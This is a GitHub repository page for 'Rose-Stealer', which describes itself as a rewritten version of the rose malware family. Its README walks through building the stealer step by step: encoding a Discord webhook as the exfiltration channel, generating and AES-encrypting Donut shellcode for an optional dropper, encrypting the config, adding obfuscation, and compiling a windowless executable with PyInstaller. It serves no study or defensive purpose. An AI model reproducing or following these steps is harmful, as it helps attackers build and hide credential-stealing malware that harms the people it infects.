Skip to content

0xRose/Rose-Stealer

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
assets
assets
 
 
payload
payload
 
 
utils
utils
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

🐍 Rose-Stealer

Rewritten version of the rose malware family.

Caution

I am not liable for anything that is happening with this software. If you don't trust it, read the source.

Important

This is a small rewritten version for the rose implant. I don't provide support for this. You should know what you're doing.

Requirements

  • Python 3.10+
  • Python-Libs installed (pip install -r assets\requirements.txt)

Setup

Download the source code of this repository.

  • Encode your Discord Webhook: python utils\b85_encode.py DISCORD_WEBHOOK
    • Place the output in the config.ini file
    [main]
# base 85 encoded and hexified discord webhook
discord_webhook=DISCORD_WEBHOOK <--- Put the encoded webhook here
  • File dropper if wanted:
    • generate shellcode with Donut for an executable file to e.g. client\ shellc.dat
    • AES encrypt the shellcode file:
      • python utils\aes_encrypt.py payload\shellc.dat payload\shellc.aes
      • Copy the output key into your config.ini file like this:
      [shellcode_loader]
# file path storing AES encrypted and compressed shellcode
shellcode_file_name=shellc.aes
# hexified 32 byte (128-bit AES key)
shellcode_key=AES_KEY <--- Put the AES key here
  • Edit the config file and change the False statements accordingly to True for your needs.
  • Now encrypt the config file:
    • python utils\aes_encrypt.py payload\config.ini payload\config.aes
    • Put the output key you received into the malware source code on line 380: 
      key = "AES_KEY"  # hexified 32 byte key (128-bit) <--- Put the AES key here

(Additionally i would recommend to add obfuscation on the script now.)

  • You can now compile it into a binary:
    • Dropper enabled: pyinstaller --noconsole --onefile --clean --add-data "payload\shellc.aes;." --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py
    • Dropped disabled: pyinstaller --noconsole --onefile --clean --add-data "payload\config.aes;." --hidden-import cryptography --hidden-import pywin32 --hidden-import pillow --hidden-import aiohttp payload\main.py

Yay! Your executable is now inside of the dist folder.

About

Rewritten version of the rose malware family.

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

9 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages